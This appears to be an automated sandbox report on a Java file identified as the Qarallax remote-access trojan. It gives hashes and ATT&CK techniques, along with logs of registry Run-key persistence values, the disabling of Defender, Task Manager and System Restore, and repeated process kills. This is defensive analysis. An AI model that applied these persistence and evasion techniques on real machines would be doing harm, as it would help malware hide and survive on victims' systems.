qarallax | a4a5c90b835592cb0ed02f3cdd7697c937c2e86fe204ba1a9f1b3f3c52f57963

Analysis

max time kernel
113s
max time network
142s
platform
windows10_x64
resource
win10v200722
submitted
19-08-2020 07:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PI_revisado.jar
Size

410KB
MD5

0922b16b4e870dcf93bff729f84ad597
SHA1

259e5380c4655ce5076a89e1f41c4764c1810825
SHA256

a4a5c90b835592cb0ed02f3cdd7697c937c2e86fe204ba1a9f1b3f3c52f57963
SHA512

51c05bb76c7217e70dd54711dfdcc23b77eec09a3531d01b49c7f9423a8121848e6430c4f4276f2af62193c6fc64010046cfe3c1b80e7577f4c1e6b76259c8e0

Score

10^/10

trojan qarallax persistence evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae96-57.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
504	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\ikprqQu = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\TKnJu\\nfOlo.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\Run\ikprqQu = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\TKnJu\\nfOlo.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\TKnJu\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\TKnJu\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\TKnJu\Desktop.ini	java.exe
File created	C:\Users\Admin\TKnJu\Desktop.ini	java.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\CENUL	java.exe
File opened for modification	C:\Windows\System32\CENUL	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
3984	taskkill.exe
4848	taskkill.exe
4552	taskkill.exe
4632	taskkill.exe
3492	taskkill.exe
2632	taskkill.exe
5104	taskkill.exe
4284	taskkill.exe
4200	taskkill.exe
5032	taskkill.exe
4312	taskkill.exe
2276	taskkill.exe
2024	taskkill.exe
4268	taskkill.exe
4184	taskkill.exe
4752	taskkill.exe
1536	taskkill.exe
2024	taskkill.exe
4488	taskkill.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1356	powershell.exe
1356	powershell.exe
1356	powershell.exe
1356	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
504	java.exe

Suspicious use of AdjustPrivilegeToken 167 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2560	WMIC.exe
Token: SeSecurityPrivilege	2560	WMIC.exe
Token: SeTakeOwnershipPrivilege	2560	WMIC.exe
Token: SeLoadDriverPrivilege	2560	WMIC.exe
Token: SeSystemProfilePrivilege	2560	WMIC.exe
Token: SeSystemtimePrivilege	2560	WMIC.exe
Token: SeProfSingleProcessPrivilege	2560	WMIC.exe
Token: SeIncBasePriorityPrivilege	2560	WMIC.exe
Token: SeCreatePagefilePrivilege	2560	WMIC.exe
Token: SeBackupPrivilege	2560	WMIC.exe
Token: SeRestorePrivilege	2560	WMIC.exe
Token: SeShutdownPrivilege	2560	WMIC.exe
Token: SeDebugPrivilege	2560	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2560	WMIC.exe
Token: SeRemoteShutdownPrivilege	2560	WMIC.exe
Token: SeUndockPrivilege	2560	WMIC.exe
Token: SeManageVolumePrivilege	2560	WMIC.exe
Token: 33	2560	WMIC.exe
Token: 34	2560	WMIC.exe
Token: 35	2560	WMIC.exe
Token: 36	2560	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2560	WMIC.exe
Token: SeSecurityPrivilege	2560	WMIC.exe
Token: SeTakeOwnershipPrivilege	2560	WMIC.exe
Token: SeLoadDriverPrivilege	2560	WMIC.exe
Token: SeSystemProfilePrivilege	2560	WMIC.exe
Token: SeSystemtimePrivilege	2560	WMIC.exe
Token: SeProfSingleProcessPrivilege	2560	WMIC.exe
Token: SeIncBasePriorityPrivilege	2560	WMIC.exe
Token: SeCreatePagefilePrivilege	2560	WMIC.exe
Token: SeBackupPrivilege	2560	WMIC.exe
Token: SeRestorePrivilege	2560	WMIC.exe
Token: SeShutdownPrivilege	2560	WMIC.exe
Token: SeDebugPrivilege	2560	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2560	WMIC.exe
Token: SeRemoteShutdownPrivilege	2560	WMIC.exe
Token: SeUndockPrivilege	2560	WMIC.exe
Token: SeManageVolumePrivilege	2560	WMIC.exe
Token: 33	2560	WMIC.exe
Token: 34	2560	WMIC.exe
Token: 35	2560	WMIC.exe
Token: 36	2560	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3828	WMIC.exe
Token: SeSecurityPrivilege	3828	WMIC.exe
Token: SeTakeOwnershipPrivilege	3828	WMIC.exe
Token: SeLoadDriverPrivilege	3828	WMIC.exe
Token: SeSystemProfilePrivilege	3828	WMIC.exe
Token: SeSystemtimePrivilege	3828	WMIC.exe
Token: SeProfSingleProcessPrivilege	3828	WMIC.exe
Token: SeIncBasePriorityPrivilege	3828	WMIC.exe
Token: SeCreatePagefilePrivilege	3828	WMIC.exe
Token: SeBackupPrivilege	3828	WMIC.exe
Token: SeRestorePrivilege	3828	WMIC.exe
Token: SeShutdownPrivilege	3828	WMIC.exe
Token: SeDebugPrivilege	3828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3828	WMIC.exe
Token: SeRemoteShutdownPrivilege	3828	WMIC.exe
Token: SeUndockPrivilege	3828	WMIC.exe
Token: SeManageVolumePrivilege	3828	WMIC.exe
Token: 33	3828	WMIC.exe
Token: 34	3828	WMIC.exe
Token: 35	3828	WMIC.exe
Token: 36	3828	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3828	WMIC.exe
Token: SeSecurityPrivilege	3828	WMIC.exe
Token: SeTakeOwnershipPrivilege	3828	WMIC.exe
Token: SeLoadDriverPrivilege	3828	WMIC.exe
Token: SeSystemProfilePrivilege	3828	WMIC.exe
Token: SeSystemtimePrivilege	3828	WMIC.exe
Token: SeProfSingleProcessPrivilege	3828	WMIC.exe
Token: SeIncBasePriorityPrivilege	3828	WMIC.exe
Token: SeCreatePagefilePrivilege	3828	WMIC.exe
Token: SeBackupPrivilege	3828	WMIC.exe
Token: SeRestorePrivilege	3828	WMIC.exe
Token: SeShutdownPrivilege	3828	WMIC.exe
Token: SeDebugPrivilege	3828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3828	WMIC.exe
Token: SeRemoteShutdownPrivilege	3828	WMIC.exe
Token: SeUndockPrivilege	3828	WMIC.exe
Token: SeManageVolumePrivilege	3828	WMIC.exe
Token: 33	3828	WMIC.exe
Token: 34	3828	WMIC.exe
Token: 35	3828	WMIC.exe
Token: 36	3828	WMIC.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1356	powershell.exe
Token: SeSecurityPrivilege	1356	powershell.exe
Token: SeTakeOwnershipPrivilege	1356	powershell.exe
Token: SeLoadDriverPrivilege	1356	powershell.exe
Token: SeSystemProfilePrivilege	1356	powershell.exe
Token: SeSystemtimePrivilege	1356	powershell.exe
Token: SeProfSingleProcessPrivilege	1356	powershell.exe
Token: SeIncBasePriorityPrivilege	1356	powershell.exe
Token: SeCreatePagefilePrivilege	1356	powershell.exe
Token: SeBackupPrivilege	1356	powershell.exe
Token: SeRestorePrivilege	1356	powershell.exe
Token: SeShutdownPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeSystemEnvironmentPrivilege	1356	powershell.exe
Token: SeRemoteShutdownPrivilege	1356	powershell.exe
Token: SeUndockPrivilege	1356	powershell.exe
Token: SeManageVolumePrivilege	1356	powershell.exe
Token: 33	1356	powershell.exe
Token: 34	1356	powershell.exe
Token: 35	1356	powershell.exe
Token: 36	1356	powershell.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeIncreaseQuotaPrivilege	760	WMIC.exe
Token: SeSecurityPrivilege	760	WMIC.exe
Token: SeTakeOwnershipPrivilege	760	WMIC.exe
Token: SeLoadDriverPrivilege	760	WMIC.exe
Token: SeSystemProfilePrivilege	760	WMIC.exe
Token: SeSystemtimePrivilege	760	WMIC.exe
Token: SeProfSingleProcessPrivilege	760	WMIC.exe
Token: SeIncBasePriorityPrivilege	760	WMIC.exe
Token: SeCreatePagefilePrivilege	760	WMIC.exe
Token: SeBackupPrivilege	760	WMIC.exe
Token: SeRestorePrivilege	760	WMIC.exe
Token: SeShutdownPrivilege	760	WMIC.exe
Token: SeDebugPrivilege	760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	760	WMIC.exe
Token: SeRemoteShutdownPrivilege	760	WMIC.exe
Token: SeUndockPrivilege	760	WMIC.exe
Token: SeManageVolumePrivilege	760	WMIC.exe
Token: 33	760	WMIC.exe
Token: 34	760	WMIC.exe
Token: 35	760	WMIC.exe
Token: 36	760	WMIC.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeIncreaseQuotaPrivilege	760	WMIC.exe
Token: SeSecurityPrivilege	760	WMIC.exe
Token: SeTakeOwnershipPrivilege	760	WMIC.exe
Token: SeLoadDriverPrivilege	760	WMIC.exe
Token: SeSystemProfilePrivilege	760	WMIC.exe
Token: SeSystemtimePrivilege	760	WMIC.exe
Token: SeProfSingleProcessPrivilege	760	WMIC.exe
Token: SeIncBasePriorityPrivilege	760	WMIC.exe
Token: SeCreatePagefilePrivilege	760	WMIC.exe
Token: SeBackupPrivilege	760	WMIC.exe
Token: SeRestorePrivilege	760	WMIC.exe
Token: SeShutdownPrivilege	760	WMIC.exe
Token: SeDebugPrivilege	760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	760	WMIC.exe
Token: SeRemoteShutdownPrivilege	760	WMIC.exe
Token: SeUndockPrivilege	760	WMIC.exe
Token: SeManageVolumePrivilege	760	WMIC.exe
Token: 33	760	WMIC.exe
Token: 34	760	WMIC.exe
Token: 35	760	WMIC.exe
Token: 36	760	WMIC.exe
Token: SeDebugPrivilege	3492	taskkill.exe
Token: SeDebugPrivilege	4268	taskkill.exe
Token: SeDebugPrivilege	2632	taskkill.exe
Token: SeDebugPrivilege	4848	taskkill.exe
Token: SeDebugPrivilege	5104	taskkill.exe
Token: SeDebugPrivilege	4184	taskkill.exe
Token: SeDebugPrivilege	4284	taskkill.exe
Token: SeDebugPrivilege	4488	taskkill.exe
Token: SeDebugPrivilege	4752	taskkill.exe
Token: SeDebugPrivilege	5032	taskkill.exe
Token: SeDebugPrivilege	4200	taskkill.exe
Token: SeDebugPrivilege	4312	taskkill.exe
Token: SeDebugPrivilege	4552	taskkill.exe
Token: SeDebugPrivilege	4632	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
504	java.exe

Suspicious use of WriteProcessMemory 416 IoCs

description	pid	Process	procid_target
PID 504 wrote to memory of 2256	504	java.exe	68
PID 504 wrote to memory of 2256	504	java.exe	68
PID 504 wrote to memory of 2496	504	java.exe	70
PID 504 wrote to memory of 2496	504	java.exe	70
PID 2496 wrote to memory of 2560	2496	cmd.exe	72
PID 2496 wrote to memory of 2560	2496	cmd.exe	72
PID 504 wrote to memory of 3092	504	java.exe	73
PID 504 wrote to memory of 3092	504	java.exe	73
PID 3092 wrote to memory of 3828	3092	cmd.exe	75
PID 3092 wrote to memory of 3828	3092	cmd.exe	75
PID 504 wrote to memory of 3332	504	java.exe	76
PID 504 wrote to memory of 3332	504	java.exe	76
PID 504 wrote to memory of 1640	504	java.exe	78
PID 504 wrote to memory of 1640	504	java.exe	78
PID 504 wrote to memory of 3468	504	java.exe	80
PID 504 wrote to memory of 3468	504	java.exe	80
PID 504 wrote to memory of 3388	504	java.exe	81
PID 504 wrote to memory of 3388	504	java.exe	81
PID 504 wrote to memory of 1616	504	java.exe	83
PID 504 wrote to memory of 1616	504	java.exe	83
PID 504 wrote to memory of 3556	504	java.exe	85
PID 504 wrote to memory of 3556	504	java.exe	85
PID 504 wrote to memory of 760	504	java.exe	87
PID 504 wrote to memory of 760	504	java.exe	87
PID 504 wrote to memory of 3888	504	java.exe	89
PID 504 wrote to memory of 3888	504	java.exe	89
PID 504 wrote to memory of 3760	504	java.exe	92
PID 504 wrote to memory of 3760	504	java.exe	92
PID 504 wrote to memory of 1356	504	java.exe	94
PID 504 wrote to memory of 1356	504	java.exe	94
PID 504 wrote to memory of 1460	504	java.exe	95
PID 504 wrote to memory of 1460	504	java.exe	95
PID 504 wrote to memory of 1520	504	java.exe	96
PID 504 wrote to memory of 1520	504	java.exe	96
PID 504 wrote to memory of 1536	504	java.exe	97
PID 504 wrote to memory of 1536	504	java.exe	97
PID 504 wrote to memory of 952	504	java.exe	102
PID 504 wrote to memory of 952	504	java.exe	102
PID 504 wrote to memory of 2272	504	java.exe	103
PID 504 wrote to memory of 2272	504	java.exe	103
PID 504 wrote to memory of 3852	504	java.exe	106
PID 504 wrote to memory of 3852	504	java.exe	106
PID 504 wrote to memory of 3992	504	java.exe	107
PID 504 wrote to memory of 3992	504	java.exe	107
PID 504 wrote to memory of 3600	504	java.exe	110
PID 504 wrote to memory of 3600	504	java.exe	110
PID 504 wrote to memory of 784	504	java.exe	111
PID 504 wrote to memory of 784	504	java.exe	111
PID 504 wrote to memory of 3612	504	java.exe	114
PID 504 wrote to memory of 3612	504	java.exe	114
PID 504 wrote to memory of 1928	504	java.exe	115
PID 504 wrote to memory of 1928	504	java.exe	115
PID 3760 wrote to memory of 3816	3760	cmd.exe	116
PID 3760 wrote to memory of 3816	3760	cmd.exe	116
PID 504 wrote to memory of 2208	504	java.exe	119
PID 504 wrote to memory of 2208	504	java.exe	119
PID 504 wrote to memory of 1572	504	java.exe	120
PID 504 wrote to memory of 1572	504	java.exe	120
PID 504 wrote to memory of 3528	504	java.exe	123
PID 504 wrote to memory of 3528	504	java.exe	123
PID 504 wrote to memory of 3000	504	java.exe	124
PID 504 wrote to memory of 3000	504	java.exe	124
PID 504 wrote to memory of 2692	504	java.exe	127
PID 504 wrote to memory of 2692	504	java.exe	127
PID 504 wrote to memory of 1320	504	java.exe	128
PID 504 wrote to memory of 1320	504	java.exe	128
PID 504 wrote to memory of 3544	504	java.exe	132
PID 504 wrote to memory of 3544	504	java.exe	132
PID 504 wrote to memory of 2560	504	java.exe	133
PID 504 wrote to memory of 2560	504	java.exe	133
PID 504 wrote to memory of 2276	504	java.exe	135
PID 504 wrote to memory of 2276	504	java.exe	135
PID 504 wrote to memory of 1556	504	java.exe	137
PID 504 wrote to memory of 1556	504	java.exe	137
PID 504 wrote to memory of 760	504	java.exe	138
PID 504 wrote to memory of 760	504	java.exe	138
PID 504 wrote to memory of 2260	504	java.exe	140
PID 504 wrote to memory of 2260	504	java.exe	140
PID 504 wrote to memory of 3144	504	java.exe	143
PID 504 wrote to memory of 3144	504	java.exe	143
PID 504 wrote to memory of 2684	504	java.exe	145
PID 504 wrote to memory of 2684	504	java.exe	145
PID 504 wrote to memory of 3764	504	java.exe	148
PID 504 wrote to memory of 3764	504	java.exe	148
PID 504 wrote to memory of 2308	504	java.exe	149
PID 504 wrote to memory of 2308	504	java.exe	149
PID 3760 wrote to memory of 2512	3760	cmd.exe	151
PID 3760 wrote to memory of 2512	3760	cmd.exe	151
PID 504 wrote to memory of 3840	504	java.exe	153
PID 504 wrote to memory of 3840	504	java.exe	153
PID 504 wrote to memory of 2552	504	java.exe	155
PID 504 wrote to memory of 2552	504	java.exe	155
PID 504 wrote to memory of 2824	504	java.exe	157
PID 504 wrote to memory of 2824	504	java.exe	157
PID 504 wrote to memory of 2476	504	java.exe	159
PID 504 wrote to memory of 2476	504	java.exe	159
PID 504 wrote to memory of 2560	504	java.exe	161
PID 504 wrote to memory of 2560	504	java.exe	161
PID 504 wrote to memory of 1368	504	java.exe	163
PID 504 wrote to memory of 1368	504	java.exe	163
PID 504 wrote to memory of 2684	504	java.exe	164
PID 504 wrote to memory of 2684	504	java.exe	164
PID 504 wrote to memory of 3620	504	java.exe	166
PID 504 wrote to memory of 3620	504	java.exe	166
PID 2684 wrote to memory of 3992	2684	cmd.exe	169
PID 2684 wrote to memory of 3992	2684	cmd.exe	169
PID 2684 wrote to memory of 1572	2684	cmd.exe	170
PID 2684 wrote to memory of 1572	2684	cmd.exe	170
PID 504 wrote to memory of 2024	504	java.exe	171
PID 504 wrote to memory of 2024	504	java.exe	171
PID 504 wrote to memory of 2512	504	java.exe	173
PID 504 wrote to memory of 2512	504	java.exe	173
PID 2512 wrote to memory of 2632	2512	cmd.exe	175
PID 2512 wrote to memory of 2632	2512	cmd.exe	175
PID 2512 wrote to memory of 2624	2512	cmd.exe	176
PID 2512 wrote to memory of 2624	2512	cmd.exe	176
PID 504 wrote to memory of 2692	504	java.exe	177
PID 504 wrote to memory of 2692	504	java.exe	177
PID 2692 wrote to memory of 1828	2692	cmd.exe	179
PID 2692 wrote to memory of 1828	2692	cmd.exe	179
PID 2692 wrote to memory of 3856	2692	cmd.exe	180
PID 2692 wrote to memory of 3856	2692	cmd.exe	180
PID 504 wrote to memory of 1900	504	java.exe	181
PID 504 wrote to memory of 1900	504	java.exe	181
PID 1900 wrote to memory of 3372	1900	cmd.exe	183
PID 1900 wrote to memory of 3372	1900	cmd.exe	183
PID 1900 wrote to memory of 760	1900	cmd.exe	184
PID 1900 wrote to memory of 760	1900	cmd.exe	184
PID 504 wrote to memory of 2996	504	java.exe	185
PID 504 wrote to memory of 2996	504	java.exe	185
PID 2996 wrote to memory of 1520	2996	cmd.exe	188
PID 2996 wrote to memory of 1520	2996	cmd.exe	188
PID 2996 wrote to memory of 692	2996	cmd.exe	189
PID 2996 wrote to memory of 692	2996	cmd.exe	189
PID 504 wrote to memory of 3916	504	java.exe	190
PID 504 wrote to memory of 3916	504	java.exe	190
PID 3916 wrote to memory of 1568	3916	cmd.exe	192
PID 3916 wrote to memory of 1568	3916	cmd.exe	192
PID 3916 wrote to memory of 3808	3916	cmd.exe	193
PID 3916 wrote to memory of 3808	3916	cmd.exe	193
PID 504 wrote to memory of 2584	504	java.exe	194
PID 504 wrote to memory of 2584	504	java.exe	194
PID 2584 wrote to memory of 1232	2584	cmd.exe	196
PID 2584 wrote to memory of 1232	2584	cmd.exe	196
PID 504 wrote to memory of 2024	504	java.exe	197
PID 504 wrote to memory of 2024	504	java.exe	197
PID 2584 wrote to memory of 3012	2584	cmd.exe	199
PID 2584 wrote to memory of 3012	2584	cmd.exe	199
PID 504 wrote to memory of 732	504	java.exe	200
PID 504 wrote to memory of 732	504	java.exe	200
PID 732 wrote to memory of 3528	732	cmd.exe	202
PID 732 wrote to memory of 3528	732	cmd.exe	202
PID 732 wrote to memory of 3984	732	cmd.exe	203
PID 732 wrote to memory of 3984	732	cmd.exe	203
PID 504 wrote to memory of 4020	504	java.exe	204
PID 504 wrote to memory of 4020	504	java.exe	204
PID 4020 wrote to memory of 3860	4020	cmd.exe	206
PID 4020 wrote to memory of 3860	4020	cmd.exe	206
PID 4020 wrote to memory of 3992	4020	cmd.exe	207
PID 4020 wrote to memory of 3992	4020	cmd.exe	207
PID 504 wrote to memory of 1568	504	java.exe	208
PID 504 wrote to memory of 1568	504	java.exe	208
PID 1568 wrote to memory of 2840	1568	cmd.exe	210
PID 1568 wrote to memory of 2840	1568	cmd.exe	210
PID 1568 wrote to memory of 2796	1568	cmd.exe	211
PID 1568 wrote to memory of 2796	1568	cmd.exe	211
PID 504 wrote to memory of 3872	504	java.exe	212
PID 504 wrote to memory of 3872	504	java.exe	212
PID 3872 wrote to memory of 3920	3872	cmd.exe	214
PID 3872 wrote to memory of 3920	3872	cmd.exe	214
PID 3872 wrote to memory of 1216	3872	cmd.exe	215
PID 3872 wrote to memory of 1216	3872	cmd.exe	215
PID 504 wrote to memory of 3548	504	java.exe	216
PID 504 wrote to memory of 3548	504	java.exe	216
PID 504 wrote to memory of 2476	504	java.exe	218
PID 504 wrote to memory of 2476	504	java.exe	218
PID 3548 wrote to memory of 2508	3548	cmd.exe	220
PID 3548 wrote to memory of 2508	3548	cmd.exe	220
PID 3548 wrote to memory of 2256	3548	cmd.exe	221
PID 3548 wrote to memory of 2256	3548	cmd.exe	221
PID 2476 wrote to memory of 760	2476	cmd.exe	222
PID 2476 wrote to memory of 760	2476	cmd.exe	222
PID 504 wrote to memory of 3984	504	java.exe	223
PID 504 wrote to memory of 3984	504	java.exe	223
PID 504 wrote to memory of 3756	504	java.exe	225
PID 504 wrote to memory of 3756	504	java.exe	225
PID 3756 wrote to memory of 2840	3756	cmd.exe	227
PID 3756 wrote to memory of 2840	3756	cmd.exe	227
PID 3756 wrote to memory of 2796	3756	cmd.exe	228
PID 3756 wrote to memory of 2796	3756	cmd.exe	228
PID 504 wrote to memory of 2524	504	java.exe	229
PID 504 wrote to memory of 2524	504	java.exe	229
PID 2524 wrote to memory of 3732	2524	cmd.exe	231
PID 2524 wrote to memory of 3732	2524	cmd.exe	231
PID 2524 wrote to memory of 3820	2524	cmd.exe	232
PID 2524 wrote to memory of 3820	2524	cmd.exe	232
PID 504 wrote to memory of 3124	504	java.exe	233
PID 504 wrote to memory of 3124	504	java.exe	233
PID 3124 wrote to memory of 2840	3124	cmd.exe	235
PID 3124 wrote to memory of 2840	3124	cmd.exe	235
PID 3124 wrote to memory of 2848	3124	cmd.exe	236
PID 3124 wrote to memory of 2848	3124	cmd.exe	236
PID 504 wrote to memory of 2984	504	java.exe	237
PID 504 wrote to memory of 2984	504	java.exe	237
PID 2984 wrote to memory of 4008	2984	cmd.exe	239
PID 2984 wrote to memory of 4008	2984	cmd.exe	239
PID 2984 wrote to memory of 2024	2984	cmd.exe	240
PID 2984 wrote to memory of 2024	2984	cmd.exe	240
PID 504 wrote to memory of 3384	504	java.exe	241
PID 504 wrote to memory of 3384	504	java.exe	241
PID 3384 wrote to memory of 3828	3384	cmd.exe	243
PID 3384 wrote to memory of 3828	3384	cmd.exe	243
PID 3384 wrote to memory of 3888	3384	cmd.exe	244
PID 3384 wrote to memory of 3888	3384	cmd.exe	244
PID 504 wrote to memory of 4008	504	java.exe	245
PID 504 wrote to memory of 4008	504	java.exe	245
PID 4008 wrote to memory of 680	4008	cmd.exe	247
PID 4008 wrote to memory of 680	4008	cmd.exe	247
PID 4008 wrote to memory of 3828	4008	cmd.exe	248
PID 4008 wrote to memory of 3828	4008	cmd.exe	248
PID 504 wrote to memory of 2552	504	java.exe	249
PID 504 wrote to memory of 2552	504	java.exe	249
PID 2552 wrote to memory of 3016	2552	cmd.exe	251
PID 2552 wrote to memory of 3016	2552	cmd.exe	251
PID 504 wrote to memory of 3492	504	java.exe	252
PID 504 wrote to memory of 3492	504	java.exe	252
PID 2552 wrote to memory of 4000	2552	cmd.exe	254
PID 2552 wrote to memory of 4000	2552	cmd.exe	254
PID 504 wrote to memory of 992	504	java.exe	255
PID 504 wrote to memory of 992	504	java.exe	255
PID 992 wrote to memory of 2848	992	cmd.exe	257
PID 992 wrote to memory of 2848	992	cmd.exe	257
PID 992 wrote to memory of 4112	992	cmd.exe	258
PID 992 wrote to memory of 4112	992	cmd.exe	258
PID 504 wrote to memory of 4132	504	java.exe	259
PID 504 wrote to memory of 4132	504	java.exe	259
PID 4132 wrote to memory of 4168	4132	cmd.exe	261
PID 4132 wrote to memory of 4168	4132	cmd.exe	261
PID 4132 wrote to memory of 4188	4132	cmd.exe	262
PID 4132 wrote to memory of 4188	4132	cmd.exe	262
PID 504 wrote to memory of 4208	504	java.exe	263
PID 504 wrote to memory of 4208	504	java.exe	263
PID 4208 wrote to memory of 4248	4208	cmd.exe	265
PID 4208 wrote to memory of 4248	4208	cmd.exe	265
PID 504 wrote to memory of 4268	504	java.exe	266
PID 504 wrote to memory of 4268	504	java.exe	266
PID 4208 wrote to memory of 4280	4208	cmd.exe	267
PID 4208 wrote to memory of 4280	4208	cmd.exe	267
PID 504 wrote to memory of 4320	504	java.exe	269
PID 504 wrote to memory of 4320	504	java.exe	269
PID 4320 wrote to memory of 4388	4320	cmd.exe	271
PID 4320 wrote to memory of 4388	4320	cmd.exe	271
PID 4320 wrote to memory of 4408	4320	cmd.exe	272
PID 4320 wrote to memory of 4408	4320	cmd.exe	272
PID 504 wrote to memory of 4428	504	java.exe	273
PID 504 wrote to memory of 4428	504	java.exe	273
PID 4428 wrote to memory of 4464	4428	cmd.exe	275
PID 4428 wrote to memory of 4464	4428	cmd.exe	275
PID 4428 wrote to memory of 4484	4428	cmd.exe	276
PID 4428 wrote to memory of 4484	4428	cmd.exe	276
PID 504 wrote to memory of 4504	504	java.exe	277
PID 504 wrote to memory of 4504	504	java.exe	277
PID 4504 wrote to memory of 4544	4504	cmd.exe	279
PID 4504 wrote to memory of 4544	4504	cmd.exe	279
PID 4504 wrote to memory of 4564	4504	cmd.exe	280
PID 4504 wrote to memory of 4564	4504	cmd.exe	280
PID 504 wrote to memory of 4584	504	java.exe	281
PID 504 wrote to memory of 4584	504	java.exe	281
PID 4584 wrote to memory of 4620	4584	cmd.exe	283
PID 4584 wrote to memory of 4620	4584	cmd.exe	283
PID 4584 wrote to memory of 4640	4584	cmd.exe	284
PID 4584 wrote to memory of 4640	4584	cmd.exe	284
PID 504 wrote to memory of 4660	504	java.exe	285
PID 504 wrote to memory of 4660	504	java.exe	285
PID 4660 wrote to memory of 4696	4660	cmd.exe	287
PID 4660 wrote to memory of 4696	4660	cmd.exe	287
PID 4660 wrote to memory of 4716	4660	cmd.exe	288
PID 4660 wrote to memory of 4716	4660	cmd.exe	288
PID 504 wrote to memory of 4736	504	java.exe	289
PID 504 wrote to memory of 4736	504	java.exe	289
PID 4736 wrote to memory of 4772	4736	cmd.exe	291
PID 4736 wrote to memory of 4772	4736	cmd.exe	291
PID 4736 wrote to memory of 4792	4736	cmd.exe	292
PID 4736 wrote to memory of 4792	4736	cmd.exe	292
PID 504 wrote to memory of 4812	504	java.exe	293
PID 504 wrote to memory of 4812	504	java.exe	293
PID 4812 wrote to memory of 4848	4812	cmd.exe	295
PID 4812 wrote to memory of 4848	4812	cmd.exe	295
PID 4812 wrote to memory of 4868	4812	cmd.exe	296
PID 4812 wrote to memory of 4868	4812	cmd.exe	296
PID 504 wrote to memory of 4888	504	java.exe	297
PID 504 wrote to memory of 4888	504	java.exe	297
PID 4888 wrote to memory of 4924	4888	cmd.exe	299
PID 4888 wrote to memory of 4924	4888	cmd.exe	299
PID 4888 wrote to memory of 4944	4888	cmd.exe	300
PID 4888 wrote to memory of 4944	4888	cmd.exe	300
PID 504 wrote to memory of 4964	504	java.exe	301
PID 504 wrote to memory of 4964	504	java.exe	301
PID 4964 wrote to memory of 5000	4964	cmd.exe	303
PID 4964 wrote to memory of 5000	4964	cmd.exe	303
PID 4964 wrote to memory of 5020	4964	cmd.exe	304
PID 4964 wrote to memory of 5020	4964	cmd.exe	304
PID 504 wrote to memory of 5040	504	java.exe	305
PID 504 wrote to memory of 5040	504	java.exe	305
PID 5040 wrote to memory of 5076	5040	cmd.exe	307
PID 5040 wrote to memory of 5076	5040	cmd.exe	307
PID 5040 wrote to memory of 5096	5040	cmd.exe	308
PID 5040 wrote to memory of 5096	5040	cmd.exe	308
PID 504 wrote to memory of 5116	504	java.exe	309
PID 504 wrote to memory of 5116	504	java.exe	309
PID 5116 wrote to memory of 3804	5116	cmd.exe	311
PID 5116 wrote to memory of 3804	5116	cmd.exe	311
PID 504 wrote to memory of 2632	504	java.exe	312
PID 504 wrote to memory of 2632	504	java.exe	312
PID 5116 wrote to memory of 4180	5116	cmd.exe	314
PID 5116 wrote to memory of 4180	5116	cmd.exe	314
PID 504 wrote to memory of 4192	504	java.exe	315
PID 504 wrote to memory of 4192	504	java.exe	315
PID 4192 wrote to memory of 4276	4192	cmd.exe	317
PID 4192 wrote to memory of 4276	4192	cmd.exe	317
PID 4192 wrote to memory of 4296	4192	cmd.exe	318
PID 4192 wrote to memory of 4296	4192	cmd.exe	318
PID 504 wrote to memory of 4396	504	java.exe	319
PID 504 wrote to memory of 4396	504	java.exe	319
PID 4396 wrote to memory of 4408	4396	cmd.exe	321
PID 4396 wrote to memory of 4408	4396	cmd.exe	321
PID 4396 wrote to memory of 4372	4396	cmd.exe	322
PID 4396 wrote to memory of 4372	4396	cmd.exe	322
PID 504 wrote to memory of 4436	504	java.exe	323
PID 504 wrote to memory of 4436	504	java.exe	323
